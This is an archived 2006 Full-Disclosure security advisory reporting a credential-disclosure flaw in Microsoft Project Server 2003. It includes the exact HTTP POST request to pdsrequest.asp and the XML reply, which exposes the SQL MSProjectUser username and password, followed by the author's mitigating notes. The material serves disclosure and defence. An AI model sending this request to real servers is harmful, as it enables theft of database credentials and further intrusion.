lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 15 Dec 2006 12:09:05 +1300
From: "Brett Moore" <brett.moore@...urity-assessment.com>
To: <full-disclosure@...ts.grok.org.uk>
Subject: Project Server 2003 - Credential Disclosure

==============================================================
% Project Server 2003 - Credential Disclosure
% brett.moore@...urity-assessment.com
==============================================================

Microsoft Project server 2003 implements a thick client
for some of the functionality. The thick client uses
XML requests to talk to the server of HTTP(S).

One of these requests returns the username and password
of the MSProjectUser account used to access the SQL
database as well as other system information.

--------------------------------------------------------------
POST http://SERVER/projectserver/logon/pdsrequest.asp HTTP/1.0
Accept: */*
Accept-Language: en-nz
Pragma: no-cache
Host: SERVER
Content-length: 87
Proxy-Connection: Keep-Alive
Cookie: PjSessionID=<valid cookie>

<Request>
<GetInitializationData>
<Release>1</Release>
</GetInitializationData>
</Request>

<Reply>
<HRESULT>0</HRESULT>
<STATUS>0</STATUS>
<UserName>theuser</UserName>
<GetInitializationData>
<GetLoginInformation>
<DBType>0</DBType>
<DVR>{SQLServer}</DVR>
<DB>ProjectServer</DB>
<SVR>SERVER</SVR>
<ResGlobalID>1</ResGlobalID>
<ResGlobalName>resglobal</ResGlobalName>
<UserName>MSProjectUser</UserName>              <----
<Password>sekretpass</Password>                 <----
<UserNTAccount>SERVER\USER</UserNTAccount>
</GetLoginInformation>
</Reply>
--------------------------------------------------------------

Some quick notes that mitigate this attack;
* The cookie must be a valid cookie, which is obtained via a 
  login with a valid username and password.
* Since the thick client is 'client side' any sql can be 
  manipulated anyway.
* The MSProjectUser should be a low level account anyway
* Other 'undocumented' or 'unauthorised' requests 'may' also 
  be able to be made through this method.

==============================================================
% 
==============================================================

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists